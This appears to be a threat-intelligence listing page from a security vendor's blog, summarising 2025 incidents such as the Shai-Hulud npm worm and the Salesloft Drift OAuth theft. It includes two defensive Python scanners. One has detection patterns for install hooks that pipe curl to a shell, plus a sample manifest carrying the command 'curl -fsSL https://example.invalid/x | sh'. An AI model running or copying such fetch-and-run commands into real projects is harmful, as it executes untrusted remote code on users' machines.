
Category: Threat Intelligence

Curated threat intelligence with IOCs, TTPs, and campaign analysis. Track dark web exposure via CIRCL’s AIL, enrich with geolocation and known malicious sources, and apply intel to drive proactive defense.

Red Hat Consulting GitLab Breach: What Was Taken, Who’s at Risk, and What to Do Now

Red Hat disclosed on October 2, 2025 that a third party accessed a GitLab instance used for internal collaboration by Red Hat Consulting in select engagements; Red Hat removed the access, isolated the instance, involved authorities, and is continuing the investigation. The company emphasized that the incident is confined to that Consulting GitLab environment [1][2] (redhat.com). Who claims what: A group calling itself Crimson Collective

CISA ED 25‑03 Cisco ASA: Emergency Zero‑Day Mitigation, Detection, and ROMMON Persistence Guidance

As of September 26, 2025, CISA’s ED 25‑03 mandates immediate action to identify and mitigate potential compromise of Cisco ASA and Firepower devices amid an active campaign chaining CVE‑2025‑20362 (missing authorization) with CVE‑2025‑20333 (RCE). Cisco also disclosed CVE‑2025‑20363 (web services RCE) across the ASA/FTD and IOS families. Patches are available. CISA set aggressive deadlines: core dump submissions and urgent upgrades by September 26, 2025, and

MySonicWall Breach: Firewall Config Backups Exposed — Reset Passwords Now

As of September 18, 2025, SonicWall advises impacted customers to reset their MySonicWall passwords and rotate other secrets after threat actors accessed some cloud‑stored firewall configuration backups. SonicWall reports that fewer than 5% of firewalls had backup preference files accessed; credentials in those files were encrypted; no evidence of a leak is known and this was not a ransomware event, but brute-force activity against the

Shai‑Hulud npm worm: self‑replicating supply chain attack, secret theft, and repo exposure

As of September 18, 2025, organizations that build or run JavaScript software face a high‑risk supply chain incident: the Shai‑Hulud npm worm is actively compromising maintainer accounts, inserting a malicious postinstall bundle.js into popular packages, harvesting tokens and secrets, and mass‑migrating private GitHub repositories to public. Evidence shows large‑scale propagation and data exposure; no CVE/KEV entry applies because this is a campaign, not a
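The excerpt above names the worm's foothold: an install-time lifecycle hook that runs a dropped bundle.js. A first triage step is to walk an installed tree and flag any preinstall/install/postinstall command that looks like a payload launcher. The script below is an added example for this listing, not code from the linked post or from npm; the file name bundle.js comes from the excerpt, while the other patterns (curl-pipe-shell, base64 decode) and the sample manifests are this example's own constructed choices, not a published indicator list.

```python
"""Flag npm packages whose install-time lifecycle hooks run something unexpected.

Added example for this listing, not code from the linked post or from npm.
The manifests in SAMPLE_MANIFESTS are constructed. The bundle.js file name is
taken from the Shai-Hulud excerpt; every other heuristic (the curl-pipe-shell
and base64-decode patterns, the hook names checked) is this example's choice.
"""
import json
import os
import re

# npm runs these hooks automatically during `npm install`, which is what makes
# them the natural place to hide a payload.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Command shapes worth a human look. Deliberately narrow: a postinstall that
# runs node-gyp or husky should not light up.
SUSPICIOUS_PATTERNS = {
    "node-runs-bundle.js": re.compile(r"\bnode\s+\S*bundle\.js\b"),
    "curl-pipe-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}


def inspect_manifest(manifest: dict) -> list:
    """Return one finding per lifecycle hook whose command matches a pattern."""
    findings = []
    scripts = manifest.get("scripts") or {}
    label = f"{manifest.get('name', '?')}@{manifest.get('version', '?')}"
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        for reason, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(command):
                findings.append({"package": label, "hook": hook,
                                 "reason": reason, "command": command})
    return findings


def scan_manifests(manifests) -> list:
    """Flatten inspect_manifest over an iterable of parsed package.json dicts."""
    findings = []
    for manifest in manifests:
        findings.extend(inspect_manifest(manifest))
    return findings


def scan_node_modules(root: str) -> list:
    """Walk an installed tree and inspect every package.json found in it."""
    manifests = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifests.append(json.load(fh))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than abort
    return scan_manifests(manifests)


# Constructed sample manifests (not real packages).
SAMPLE_MANIFESTS = [
    {"name": "sample-native", "version": "1.0.0",
     "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}},
    {"name": "sample-hooked", "version": "2.3.1",
     "scripts": {"postinstall": "node bundle.js"}},
    {"name": "sample-dropper", "version": "0.9.0",
     "scripts": {"preinstall": "curl -fsSL https://example.invalid/x | sh"}},
    {"name": "sample-plain", "version": "4.2.0",
     "scripts": {"build": "tsc"}},
]

if __name__ == "__main__":
    import sys
    # Pass a node_modules path to scan a real tree; with no argument the
    # constructed samples are scanned instead.
    results = (scan_node_modules(sys.argv[1]) if len(sys.argv) > 1
               else scan_manifests(SAMPLE_MANIFESTS))
    for f in results:
        print(f"{f['package']}: {f['hook']} -> {f['command']!r} [{f['reason']}]")
```

Run it against a checked-out project's node_modules and any hit is a manual-review item, not a verdict; the patterns are narrow on purpose so that legitimate native-build hooks stay quiet.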

Inside the Salesloft Drift OAuth Breach: How OAuth Tokens Fueled a Salesforce Data Theft Campaign—and How to Respond

A coordinated data theft campaign leveraged compromised OAuth access and refresh tokens tied to the Salesloft Drift integration to pull large datasets from many organizations’ Salesforce instances. Google’s Threat Intelligence Group (GTIG) attributes the activity to UNC6395 and observed systematic SOQL querying focused on harvesting credentials and secrets from CRM records. The activity window runs from at least August 8 to August 18, 2025;
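The excerpt above describes an actor who, once holding valid OAuth tokens, queried CRM records to harvest credentials and secrets. After revoking the tokens, the next question for a victim is what secret-shaped material actually sat in those records. The script below is an added example for this listing, not code from the linked post, from GTIG or from Salesforce; the three patterns (AWS access key IDs, Snowflake account hostnames, password-style assignments) are this example's own choice, and the records in SAMPLE_RECORDS are constructed, not real data.

```python
"""Triage exported CRM records for credential-like strings.

Added example for this listing, not code from the linked post, GTIG or
Salesforce. Patterns and SAMPLE_RECORDS are this example's own constructions.
"""
import re

# Each pattern has exactly one capture group: the value to report (redacted).
SECRET_PATTERNS = {
    "aws-access-key-id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "snowflake-account-host": re.compile(
        r"\b([a-z0-9][a-z0-9.-]*\.snowflakecomputing\.com)\b", re.I),
    "password-assignment": re.compile(
        r"\bpass(?:word|wd)?\s*[:=]\s*([^\s,;]+)", re.I),
}

# Free-text fields of a Case-style record; extend for other objects.
TEXT_FIELDS = ("Subject", "Description")


def redact(value: str, keep: int = 4) -> str:
    """Keep a short prefix so an analyst can correlate, mask the rest."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def scan_record(record: dict) -> list:
    """Return one finding per secret-shaped match in the record's text fields."""
    findings = []
    for field in TEXT_FIELDS:
        text = record.get(field)
        if not isinstance(text, str):
            continue
        for kind, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(text):
                findings.append({"record": record.get("Id"), "field": field,
                                 "kind": kind, "value": redact(match.group(1))})
    return findings


def scan_records(records) -> list:
    findings = []
    for record in records:
        findings.extend(scan_record(record))
    return findings


def summarize(findings) -> dict:
    """Count findings per kind so rotation work can be prioritised."""
    counts = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    return counts


# Constructed sample records; the AWS key is the documented AWS example ID.
SAMPLE_RECORDS = [
    {"Id": "500xx0000000001", "Subject": "Onboarding access",
     "Description": "Temp login for the integration: user svc-sync, "
                    "password: Tr0ub4dor&3 (rotate after)"},
    {"Id": "500xx0000000002", "Subject": "S3 export failing",
     "Description": "Key in use is AKIAIOSFODNN7EXAMPLE, bucket is exports-prod"},
    {"Id": "500xx0000000003", "Subject": "Warehouse connection",
     "Description": "Point the connector at xy12345.us-east-1.snowflakecomputing.com"},
    {"Id": "500xx0000000004", "Subject": "Billing question",
     "Description": "Customer asks why the invoice total changed"},
]

if __name__ == "__main__":
    results = scan_records(SAMPLE_RECORDS)
    for f in results:
        print(f"{f['record']} {f['field']}: {f['kind']} = {f['value']}")
    print(summarize(results))
```

Feed it a Bulk API export (one dict per row) and the summary tells you which secret classes to rotate first; the redacted prefix is enough to match a finding back to its owner without copying the secret into the incident ticket.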

CISA ICS Advisories (August 28, 2025): Nine Vendor Vulnerabilities, CVEs, and Fixes

On August 28, 2025, CISA published nine advisories covering Mitsubishi Electric, Schneider Electric, Delta Electronics, GE Vernova, and Hitachi Energy. Several issues are remotely exploitable with low attack complexity; patches exist for many products, while some Mitsubishi Electric PLC weaknesses have compensating controls only. No known public exploitation is reported as of August 28, 2025 [1] (cisa.gov). Overview: These ICS advisories span PLCs, HMI/SCADA

AI-Powered Ransomware: Inside the First Reported Case, Tactics, and How to Defend

AI-powered ransomware has moved from hypothetical to here-and-now. Public reporting by ESET and other industry outlets describes the first known case of ransomware produced with the help of a large language model (LLM), demonstrating that generative AI can compress development time and lower the skill threshold for cybercrime. While the sample analyzed was not unprecedented in capability, its existence is a watershed for defenders:

Securing Critical Infrastructure with Léargas: A Game-Changer in Cybersecurity

In today's digital age, safeguarding critical infrastructure is more crucial than ever. However, many organizations are grappling with cybersecurity challenges due to limited budgets, insufficient staffing, and outdated solutions. Enter Léargas, a comprehensive SaaS cybersecurity platform designed to address these pressing issues and change how critical infrastructure is protected.

Exciting New Features in Léargas v0.1.0-beta.4

We are thrilled to announce the upcoming release of Léargas v0.1.0-beta.4! This update introduces several significant enhancements and new features aimed at improving user experience, security, and operational efficiency across the platform. Here's a sneak peek into what's new: Switching between devices has never been easier. With multi-device session support, you can effortlessly continue your sessions without any disruptions, providing convenient access to Léargas from anywhere. This feature enhances user experience by ensuring seamless transitions across devices.

Léargas XDR – Defending America’s Critical Infrastructure

In 2014, the U.S. Department of Energy (DOE) acknowledged the pressing need for a comprehensive cybersecurity solution to the vulnerabilities faced by nearly 900 electric cooperatives. Recognizing that Extended Detection and Response (XDR) has become increasingly important to electric cooperatives in recent years, Léargas set out to build a versatile and cost-effective platform. As these cooperatives digitally transform and adopt modern technologies, they also become more exposed to sophisticated cyber threats. Such attacks not only put the integrity of the cooperatives' data at risk but also threaten the stability of the electrical grid that powers our communities.

The Crucial Role of Zeek-based Platforms like Leargas Security XDR in IT and OT Environments

Information Technology (IT) and Operational Technology (OT) ecosystems are increasingly converging in today's enterprises. As the cyber threat landscape continues to evolve and attacks grow more intricate and sophisticated, organizations are turning to advanced security solutions such as Leargas Security XDR. Built on the Zeek network analysis framework, the platform offers an all-in-one approach to securing IT and OT environments, providing the visibility and capabilities that help businesses stay ahead of potential threats.

Revolutionizing Energy Cooperatives: The Value of Leargas Security XDR

As the world becomes increasingly dependent on digital systems and automation, cybersecurity has become a pressing issue for all organizations. This is not just true of major corporations or tech firms; it applies equally to entities like energy cooperatives. Given their key responsibility for delivering vital services to communities, these cooperatives cannot afford to overlook robust cybersecurity measures.